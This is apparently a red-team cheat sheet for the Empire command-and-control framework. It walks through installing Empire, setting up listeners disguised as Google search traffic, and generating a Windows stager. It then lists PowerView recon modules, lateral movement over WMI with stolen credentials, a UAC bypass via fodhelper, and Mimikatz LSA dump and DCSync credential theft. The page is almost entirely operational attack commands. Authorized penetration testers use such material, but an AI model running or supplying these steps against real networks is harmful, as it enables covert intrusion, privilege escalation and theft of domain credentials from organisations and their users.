Empire
1. Installation
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire && sudo ./setup/install.sh
./empire
2. Listeners
*Steps to setup a listener through a redirector with high resilience level in Hacking Infrastructure/Front-line Configuration/C2 Server
Basic options:
listeners
use listener {listener}
set Name {Name}
set Port {Port}
set Host {Host}
execute
To activate HTTPS:
set CertPath /root/Empire/data
Request pattern fuzziness:
set Jitter 1 (4 to 6 seconds)
Masquerading the listener requests:
set DefaultProfile {request_uri} | {user_agent} | {header_1} | {header_2}
*Example of Masquerading the listener requests as Google search queries in Hacking Infrastructure/Front-line Configuration/C2 Server
3. Stagers
Usestager windows/launcher_bat
set Listener https_1
generate
4. PowerView embedded modules
usemodule powershell/situational_awareness/network/powerview/get_group
usemodule powershell/situational_awareness/network/powerview/get_user
usemodule powershell/situational_awareness/network/powerview/get_computer
usemodule powershell/situational_awareness/network/powerview/share_finder
usemodule powershell/situational_awareness/network/powerview/get_ou
usemodule powershell/situational_awareness/network/powerview/share_finder
Empire keeps a transcript of all commands, outputs, and files downloaded in the Empire/downloads/<agent_name> folder. The results of all the previous commands are stored in the agent.log file within that folder.
For example, to search for the string "Domain Admins":
grep -A10 "CM=Domain Admins" agent.log
5. Lateral movement
Checking information from the previous modules about users we have creds, we pass those creds to the invoke_wmi module and target the server we want to move.
creds add {Domain} {username} {password}
usemodule lateral_movement/invoke_wmi
set Listener https_1
set CredID 1
set ComputerName {computer-name}
run
6. Privesc modules
Empire marks admin sessions with a small star (*) next to the username.
To dig out users with at least local admin privileges over their workstations, we look for users with an admincount attribute greater than zero.
If we already have this information available in the results of the previous recon modules (get_user) we can grep for those users:
grep -E -B2 "admincount \s+: 1" agent.log
Empire contains a module that attempts to start a process in admin mode. This leads to the familiar Windows dialog asking for elevated credentials to execute the new process:
usemodule privesc/ask
set Listener https_1
run
Although we are in an admin account, we could be in an Empire session that is not currently using these full admin privileges.
To swap this low-privileged context for an admin one, we need too approve a prompt that's being displated on the graphical interface, which we don't have access to, so we can use the following module to bypass this prompt called User Account Control (UAC):
usemodule privesc/bypass_fodhelper
run
7. Mimikatz modules
LSA Dump:
usemodule credentials/mimikatz/lsadump
run
Domain replication abuse (dsync)
usemodule credentials/mimikatz/dcsync
run
Last updated
